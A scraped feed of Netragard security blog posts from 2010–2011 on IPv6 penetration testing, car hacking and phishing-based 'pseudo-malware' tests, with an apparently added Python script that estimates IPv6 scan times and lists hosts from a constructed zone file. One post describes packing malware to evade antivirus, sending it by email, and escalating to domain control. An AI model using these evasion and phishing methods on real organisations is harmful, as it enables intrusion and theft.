-- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-54367890735317533512011-01-14T20:44:00.001-08:002011-01-14T20:44:04.991-08:00Pentesting IPv6 vs IPv4<div class='posterous_autopost'><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: 16px; color: #cccccc; line-height: 26px;"> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">We’ve heard a bit of “noise” about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6. Let’s be clear, anyone telling you that IPv6 makes penetration testing harder doesn’t understand the first thing about real penetration testing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">What’s the point of IPv6?</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">IPv6 was designed by the <a href="http://www.ietf.org/" title="IETF" target="_blank" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Internet Engineering Task Force (“IETF”)</a> to address the issue of IPv4 address space exhaustion. IPv6 uses a 128-bit address space while IPv4 is only 32 bits. 
This means that there are 2<sup style="padding: 0px; margin: 0px;">128</sup> possible addresses with IPv6, which is far more than the 2<sup style="padding: 0px; margin: 0px;">32</sup> addresses available with IPv4. This means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">What about increased security with IPv6?</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">The IPv6 specification mandates support for the <a href="http://www.ietf.org/" title="IPSec Wikipedia" target="_blank" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Internet Protocol Security (“IPSec”)</a> protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP Packet. IPSec operates at the Internet Layer of the Internet Protocol suite and so differs from other security systems like the <a href="http://en.wikipedia.org/wiki/SSL" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Secure Socket Layer</a>, which operates at the application layer. 
This is the only significant security enhancement that IPv6 brings to the table and even this has little to no impact on penetration testing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">What some penetration testers are saying about IPv6.</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">Some penetration testers argue that IPv6 will make the job of a penetration tester more difficult because of the massive increase in potential targets. They claim that the massive increase in potential targets will make the process of discovering live targets impossibly time consuming. They argue that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years. But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="vertical-align: baseline; background-color: transparent; color: #888888; font-size: medium; padding: 0px; margin: 0px;">The very first step in any <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a> is effective and efficient reconnaissance. 
Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking an enemy. There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement. Failure to adapt will result in bad intelligence as no two targets are exactly identical.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">A small component of reconnaissance is target identification. Target identification may or may not be done with scanning depending on the nature of the <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a>. Specifically, it is impossible to deliver a true stealth / covert <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a> with automated scanners. Likewise it is very difficult to use a scanner to accurately identify targets in a network that is protected by reactive security systems (like a well configured IPS that supports black-listing). So in some/many cases doing discovery by scanning an entire block of addresses is ineffective.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">A few common methods for target identification include Social Engineering, DNS enumeration, or maybe something as simple as asking the client to provide you with a list of targets. 
Not so common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc. Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network. The number of real targets is what is important and not the number of potential targets. It would be a ridiculous waste of time to test 2<sup style="vertical-align: super; font-size: 13.3333px; padding: 0px; margin: 0px;">128 </sup>IPv6 Addresses when only 12 IP addresses are live. Not to mention that increase in time would likely translate to an increase in project cost.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">So in reality, for those who are interested, hacking an IPv6 network won’t be any more or less difficult than hacking an IPv4 network. Anyone that argues otherwise either doesn’t know what they are doing or they are looking to charge you more money for roughly the same amount of work.</span></p> </span></p></div><div class="blogger-post-footer">Netragard, LLC. 
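To put numbers on the argument above, here is an added example (not Netragard's code or methodology): it computes how long an exhaustive port-by-port sweep of an IPv6 prefix would take at a fixed probe rate, then builds a target inventory from a constructed zone-file fragment for the fictional domain example.test, where the count of live hosts, not the address space, sets the scope. The zone, the documentation-range addresses in it and the probe rate are all assumptions.

```python
"""Added example: the IPv6 address space does not set the size of a test.

Two things are shown with constructed data:
  1. how long an exhaustive probe of an IPv6 prefix would take at a fixed rate,
  2. how a target list is built from published DNS records instead, so the
     scope is the handful of live hosts, whatever the address family.
"""
import ipaddress
import re

SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Matches "name [ttl] [IN] A|AAAA address" in zone-file style lines.
RR_RE = re.compile(r"^(\S+)\s+(?:\d+\s+)?(?:IN\s+)?(A|AAAA)\s+(\S+)$", re.IGNORECASE)

# Constructed zone fragment for a fictional domain. Addresses come from the
# documentation ranges 2001:db8::/32 and 192.0.2.0/24 plus one ULA address;
# none of them are real targets. One record is deliberately malformed.
ZONE = """\
; example.test zone (constructed)
example.test.          3600 IN SOA  ns1.example.test. hostmaster.example.test. 1 7200 900 1209600 3600
example.test.          3600 IN NS   ns1.example.test.
ns1.example.test.      3600 IN AAAA 2001:db8:0:1::53
www.example.test.       300 IN AAAA 2001:db8:0:10::80
www.example.test.       300 IN A    192.0.2.80
mail.example.test.     3600 IN AAAA 2001:db8:0:20::25
vpn.example.test.      3600 IN AAAA 2001:DB8:0:30::1
old-www.example.test.   300 IN CNAME www.example.test.
intranet.example.test.  300 IN AAAA fd00:1234::10
broken.example.test.    300 IN AAAA 2001:db8:::zz
"""


def exhaustive_scan_years(prefix, probes_per_second, ports=65536):
    """Years needed to send one probe per port per address in `prefix`.

    Address counts are exact Python integers, so 2**128 loses no precision.
    """
    net = ipaddress.ip_network(prefix, strict=False)
    probes = net.num_addresses * ports
    return probes / probes_per_second / SECONDS_PER_YEAR


def targets_from_zone(zone_text, in_scope):
    """Build the live-target inventory from published A/AAAA records.

    Returns (targets, out_of_scope, malformed):
      targets      -> {normalised address: {hostnames}} inside any `in_scope` prefix
      out_of_scope -> same shape, for published addresses outside every prefix
                      (e.g. an internal ULA address leaked into a public zone,
                      which a defender wants to know about)
      malformed    -> number of A/AAAA records whose address failed to parse
    """
    scope = [ipaddress.ip_network(p) for p in in_scope]
    targets, out_of_scope, malformed = {}, {}, 0
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop zone-file comments
        m = RR_RE.match(line)
        if not m:
            continue                            # SOA, NS, CNAME, blank: not a host
        name, _rtype, addr = m.groups()
        try:
            ip = ipaddress.ip_address(addr)     # also normalises case/compression
        except ValueError:
            malformed += 1                      # skip bad data rather than crash
            continue
        # `in` is False across address families, so an IPv4 host never lands
        # in an IPv6 scope by accident.
        bucket = targets if any(ip in n for n in scope) else out_of_scope
        bucket.setdefault(str(ip), set()).add(name.rstrip(".").lower())
    return targets, out_of_scope, malformed


def by_family(targets):
    """Count live targets per address family: the number that sets test effort."""
    counts = {4: 0, 6: 0}
    for addr in targets:
        counts[ipaddress.ip_address(addr).version] += 1
    return counts


if __name__ == "__main__":
    # Even a single /64 cannot be swept port by port in any useful time frame ...
    print(f"/64 at 1e9 probes/s: {exhaustive_scan_years('2001:db8::/64', 1e9):.3g} years")
    print(f"all of IPv6:         {exhaustive_scan_years('::/0', 1e9):.3g} years")
    # ... while the published records give a scope of a few hosts immediately.
    live, leaked, bad = targets_from_zone(ZONE, ["2001:db8::/32", "192.0.2.0/24"])
    for addr, names in sorted(live.items()):
        print(f"{addr:24} {', '.join(sorted(names))}")
    print("per family:", by_family(live), "| out of scope:", sorted(leaked), "| malformed:", bad)
```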
-- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-82389236405331363452011-01-07T16:05:00.001-08:002011-01-07T16:05:00.172-08:00Hacking your car for fun and profit.<div class='posterous_autopost'><p> <p>Our CEO (Adriel Desautels) recently spoke at the <a href="http://www.ghs.com/" target="_blank">Green Hills Software</a> Elite Users Technology Summit regarding automotive hacking. During his presentation there were a series of reporters taking photographs, recording audio, etc. Of all of the articles that came out, one in particular caught our eye. We made the front page of “Elektronik iNorden” which is a Swiss technology magazine that focuses on hardware and embedded systems. You can see the full article here but you’ll probably want to translate:</p> <p><a href="http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1" target="_blank">http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1</a></p> <p><img class="aligncenter" title="Adriel Desautels" src="http://www.netragard.com/images/atd.png" height="217" alt="" width="262" /></p> <p><span style="color: #ffffff;"> </span></p> <p>What really surprised us during the presentation was how many people were in disbelief about the level of risk associated with cars built after 2007. For example, it really isn’t all that hard to program a car to kill the driver. In fact, it’s far too easy due to the overall lack of security in cars today.</p> <p>Think of a car as an IT Infrastructure. All of the servers in the infrastructure are critical systems that control things like brakes, seat belts, door locks, engine timing, airbags, lights, the radio, the dashboard display, etc. Instead of these systems being plugged into a switched network they are plugged into a hub network lacking any segmentation with no security to speak of. 
The only real difference between the car network and your business network is that the car doesn’t have an internet connection.</p> <p><a href="http://techcrunch.com/2010/11/01/the-chevy-volt-electric-gm-ib/" target="_blank">Enter the Chevrolet Volt, the first car to have its own IP address.</a> Granted we don’t yet know how the Volt’s IP address will be protected. We don’t know if each car will have a public IP address or if the cars will be connected to a private network controlled by Chevy (or someone else). What we do know is that the car will be able to reach out to the internet and so it will be vulnerable to <a href="http://www.honeynet.org/node/157" target="_blank">client side attacks</a>.</p> <p>So what happens if someone is able to attack the car?</p> <p>Realistically if someone is able to hack into the car then they will be able to take full control over almost any component of the car. They can do anything from apply the brakes, accelerate the car, prevent the brakes from applying, kill (literally destroy) the engine, apply the brakes to one side of the car, lock the doors, pretension the seat belts, etc. For those of you that think this is Science Fiction, it isn’t. <a href="http://www.autosec.org/pubs/cars-oakland2010.pdf" title="Computer scientists at the University of Washington and University of California" target="_blank">Here’s one of many research papers that demonstrates the risks. </a></p> <p>Why is this possible?</p> <p>This is possible because people adopt technology too quickly and don’t stop to think about the risks but instead are blinded by the convenience that it introduces. We see this in all industries not just automotive. IT managers, CIOs, CSOs, CEOs, etc. are always purchasing and deploying new technologies without really evaluating the risks. In fact just recently we had a client purchase a “secure email gateway” technology… it wasn’t too secure. 
We were able to hack it and access every email on the system because it relied on outdated third party software.</p> <p>Certainly another component that adds to this is that most software developers write vulnerable and buggy code (sorry guys but it’s true). Their code isn’t written to be secure, it’s written to do a specific thing like handle network traffic, beep your horn, send emails, whatever. Poor code + a lack of security awareness == high risks.</p> <p>So what can you do?</p> <p>Before you decide to adopt new technology make sure that you understand the benefits and the risks associated with the adoption. If you’re not technical enough (most people aren’t) to do a low-level security evaluation then <a href="http://www.netragard.com" target="_blank">hire someone</a> (a security researcher) to do it for you. If you don’t then you could very well be putting yourselves and your customers at serious risk.</p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com3tag:blogger.com,1999:blog-422477430134849438.post-62830023771450373772010-12-02T13:57:00.001-08:002010-12-02T17:40:39.435-08:00Untitled<div class="posterous_autopost"><p><span style=" line-height: 22px;font-family:Lucida Grande, Arial, Helvetica, sans-serif;color:#cccccc;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research &amp; Development (NERD) building at One Memorial Drive in Cambridge. 
One of the questions that surfaced inspired me to write this article.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">While there are more security solutions available today than ever before, are we actually becoming more secure or is the gap growing? The short answer is yes. The security industry is reactive in that it can only respond to threats but it cannot predict them. This is because threats are defined by malicious hackers and technology savvy criminals and not the security industry. Antivirus technology for example, was created as a response to viruses that were being written by hackers. So yes, security is getting better, technologies are advancing, and the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don’t stop to question those technologies from the perspective of a hacker…</span></p> <p size="13px" color="transparent" style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- text-align: center; padding: 0px;"><img class="aligncenter" title="Inconvenience Store" src="http://www.cartoonstock.com/newscartoons/cartoonists/msi/lowres/msin62l.jpg" height="400" alt="" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="383" /></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">A prime example of this problem is clearly demonstrated within the automotive industry. 
Computer systems that are in automobiles were not designed to withstand any sort of real hacker threat. This wasn’t much of a problem at first because automotive computer systems weren’t Internet connected and at first they didn’t have direct control over things like brakes and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions and a hacker can interface with the computer system and cause potentially catastrophic failures. Despite this the problem wasn’t perceived as particularly high risk because accessing the computer system </span><a href="http://www.csmonitor.com/USA/2010/0813/Scientists-hack-into-cars-computers-control-brakes-engine" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">required physical access</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> to the car (or close proximity for </span><a href="http://blogs.edmunds.com/strategies/2010/08/researchers-show-how-to-hack-tire-pressure-monitoring-system.html" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">TPMS like hacks</span></a><span class="Apple-style-span" style="color:#FFFFFF;">). 
That is all going to change when the </span><a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Chevy Volt</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> hits the streets since the </span><a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Chevy Volt</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> actually has its own IP address and is network connected. Is the risk really worth the convenience?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Another good example of how we adopt technology too quickly is demonstrated in critical infrastructure (power, water, communications, etc). Just like the automotive industry, critical systems were not initially designed to be plugged into the Internet. These critical systems are the systems that control the water coolant levels in our nuclear power plants or the mixtures of chemicals in water treatment plants, etc. Some of these critical systems were designed in the 1960s so the concept of the “hacker threat” didn’t exist. Other systems are very modern but even those aren’t designed to be secure as much as they are designed to be functional. 
Back in the day power plants, water treatment plants, etc. were air-gapped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience the air-gaps that once existed are almost extinct. Now our critical systems are connected to the Internet and exposed to real hacker threats; and do they get hacked? </span><a href="http://online.wsj.com/article/SB123914805204099085.html" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Yes</span></a><span class="Apple-style-span" style="color:#FFFFFF;">. Again, is the risk really worth the convenience?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Of course an example that everyone can relate to is business networks. Business networks are constantly evolving and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. These technologies usually promise to make things easier and thus save time which equates to saving money. 
For example, the other week we were delivering a </span><a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">penetration test</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> for a pharmaceutical company. This company had a video conference system setup so that they could speak with remote offices and have “face to face” conversations. They loved the technology because it made for more productive meetings and we loved the technology because it was easy to hack.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Despite the fact that the security industry is evolving at a rapid pace, it can’t keep up with the volume of people that are prematurely adopting new and untested technologies. This adoption causes the gap between good security and security risks to grow. To help close the gap consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology and maybe even to make some sort of a guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. 
One such company is </span><a href="http://www.veracode.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Veracode</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> (no affiliation with </span><a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Netragard</span></a><span class="Apple-style-span" style="color:#FFFFFF;">).</span></p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-71336332287005907882010-11-11T20:59:00.001-08:002010-11-11T20:59:23.271-08:00Fox 25 News Interview<div class='posterous_autopost'><p>Our (Netragard's) founder and president (Adriel Desautels) was recently interviewed by the local news (Fox 25) about car hacking. We thought that we'd write a quick entry and share this with you. Thank you to Fox 25 for doing such a good job with the interview. Note for the AAA guy though, once cars have IP addresses (which is now) hackers won't need to "pull up next to you to hack [your car]" and turning the car off is the least of the problems. Hackers will be able to do it from their location of choice and trust us when we say that "firewalls" don't pose much of a challenge at all. 
Anyway, enjoy the video and please feel free to comment.</p> <p><a href="http://www.myfoxboston.com/dpp/news/special_reports/could-your-car-be-a-hackers-target-20101111">http://www.myfoxboston.com/dpp/news/special_reports/could-your-car-be-a-hackers-target-20101111</a></p></div>Adriel Desautels, 2010-09-13: The Human Vulnerability<div class="posterous_autopost"><p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn't matter how many protective technology layers you have in place if the people that you've hired are putting you at risk, and they are.</span></span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Case in point: the “here you have” worm, which propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google, Coca-Cola, etc. How much money do you think that those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? 
(Hint: none)</span></span></p> <!--EndFragment--> <p></p><p></p><p style="font-weight: normal; font-style: normal; text-decoration: none;font-family:verdana, sans-serif;font-size:11px;color:#666666;"> <span class="Apple-style-span" style="font-size:medium;"><img src="http://www.netragard.com/images/worms.jpg" height="248" align="middle" alt="" width="250" /></span></p> <p style="font-weight: normal; font-style: normal; text-decoration: none;font-family:verdana, sans-serif;font-size:11px;color:#666666;"><span class="Apple-style-span" style="font-size:medium;"><span class="Apple-style-span" style="font-family:Helvetica;"></span></span></p><span class="Apple-style-span" style="font-family:Helvetica;"><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"><span class="Apple-style-span" style="font-size:130%;"><span class="Apple-style-span" style="font-size:16px;"><span class="Apple-style-span" style="font-size:100%;"><span class="Apple-style-span" style="font-size:12px;"><span class="Apple-style-span" style="font-size:medium;"> </span><!--StartFragment--></span></span></span></span></p><span class="Apple-style-span" style="font-size:130%;"><span class="Apple-style-span" style="font-size:100%;"><p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Here at <a href="http://www.netragard.com">Netragard</a> we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. 
To the best of our knowledge we are the only <a href="http://www.netragard.com">penetration testing</a> company to offer such a service (and no, we're not talking about the meterpreter).</span></span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn't get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">So how easy is it to penetrate a business using pseudo-malware? Well, in truth, it's really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of clicking the send button and sending our otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! 
Imagine the degree of success that is possible with a well-crafted email.</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (impersonation attack involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client's core infrastructure (switches, firewalls, etc.) due to a password file that we found sitting on someone's desktop (thank you for that). Once that was done, there really wasn't much more that we had left to do; it was game over. </span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">The fact of the matter is that there's nothing new about taking advantage of people that are willing to do stupid things. But is it really stupidity or is it just that employees don't have a sense of accountability? Our experience tells us that in most cases it's a lack of accountability that's the culprit.</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy. 
</span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the "here you have" worm wouldn't be such a big success.</span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Compare the cost and benefit of enforcing a strict and carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job at protecting your business from real threats? It's much more difficult to hack a network when that network is managed by people that are held accountable for its security than it is to hack a network that is protected by technology alone.</span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">So in the end there's really nothing special about the "here you have" worm. 
It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.</span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">It’s important to remember that well-written security policies don’t only impact human behavior, but generally result in better management of systems, which translates to better technological security. The benefits are significant and the overall cost is small in comparison. </span></span></p> </span></span></span></div>Adriel Desautels, 2010-08-31: That nice, new computerized car you just bought could be hackable<div class='posterous_autopost'> <div class="cnet-image-div image-REGULAR float-right" style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <table border="0" align="left"> <tr> <td> </td> <td><br /></td> </tr> <tr> <td colspan="2"> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><strong>Link: </strong><a href="http://news.cnet.com/8301-27080_3-20015184-245.html" style="font-size: 11px; color: #ff6600; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;">http://news.cnet.com/8301-27080_3-20015184-245.html</a></p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Of course, your car is probably not a high-priority target for most malicious hackers. 
